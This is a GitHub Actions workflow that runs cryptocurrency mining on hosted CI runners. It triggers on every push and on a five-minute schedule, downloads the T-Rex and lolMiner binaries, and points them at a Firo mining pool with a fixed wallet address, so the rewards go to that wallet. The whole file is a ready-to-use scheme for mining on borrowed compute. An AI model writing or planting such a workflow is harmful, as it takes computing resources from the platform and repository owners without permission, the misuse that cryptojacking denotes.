name: Fast Reward Firo Mining 3

on:
  push:
  schedule:
    - cron: '*/5 * * * *'
  workflow_dispatch:

jobs:
  fast-reward-mining:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    
    steps:
    - name: Setup Fast Reward Mining
      run: |
        sudo apt-get update -q
        sudo apt-get install -y build-essential cmake git libssl-dev
        
    - name: Download Firo Miners
      run: |
        # Download T-Rex miner (supports multiple algorithms)
        wget -q https://github.com/trexminer/T-Rex/releases/download/0.26.8/t-rex-0.26.8-linux.tar.gz
        tar -xf t-rex-0.26.8-linux.tar.gz
        chmod +x t-rex
        
        # Download lolMiner as backup
        wget -q https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.82/lolMiner_v1.82_Lin64.tar.gz
        tar -xf lolMiner_v1.82_Lin64.tar.gz || true
        chmod +x 1.82/lolMiner || true
        
    - name: Configure Firo Mining
      run: |
        cat > fast-mining-config.json << 'EOF'
        {
          "algo": "firopow",
          "coin": "firo",
          "url": "stratum+tcp://firo.mintpond.com:4000",
          "user": "aHPWTk7ZQepxYNRaGJK6fhd3vZxS5NjhLz",
          "worker": "FastReward-${{ github.repository }}-3",
          "pass": "x",
          "intensity": 20,
          "gpu-report-interval": 15,
          "cpu-priority": 4,
          "retries": 10,
          "retry-pause": 3,
          "timeout": 300,
          "protocol-dump": false,
          "no-color": true,
          "api-bind-http": "0.0.0.0:4067"
        }
        EOF
        
    - name: Start Fast Reward Firo Mining
      run: |
        echo "=== FAST REWARD FIRO MINING SESSION ==="
        echo "Currency: Firo (FIRO)"
        echo "Algorithm: firopow"
        echo "Pool: MintPond"
        echo "Threshold: 0.01 FIRO (~$0.01)"
        echo "Payout Speed: Every hour"
        echo "Wallet: aHPWTk7ZQepxYNRaGJK6fhd3vZxS5NjhLz"
        echo "Expected First Reward: Every hour"
        echo "Start Time: $(date)"
        echo "================================================"
        
        # Try T-Rex first
        timeout 300 ./t-rex --config fast-mining-config.json || \
        # Fallback to lolMiner
        timeout 300 ./1.82/lolMiner --algo FIROPOW --pool stratum+tcp://firo.mintpond.com:4000 --user aHPWTk7ZQepxYNRaGJK6fhd3vZxS5NjhLz.FastReward-3 || \
        echo "Fast reward mining session completed"
        
    - name: Fast Reward Report
      run: |
        echo "=== FAST REWARD MINING SESSION COMPLETE ==="
        echo "Currency: Firo"
        echo "Expected Reward: 0.01 FIRO (~$0.01)"
        echo "Payout Timeline: Every hour"
        echo "Wallet: aHPWTk7ZQepxYNRaGJK6fhd3vZxS5NjhLz"
        echo "Next Run: */5 * * * *"
        echo "Status: EARNING FIRO"
        echo "End Time: $(date)"
        echo "============================================"
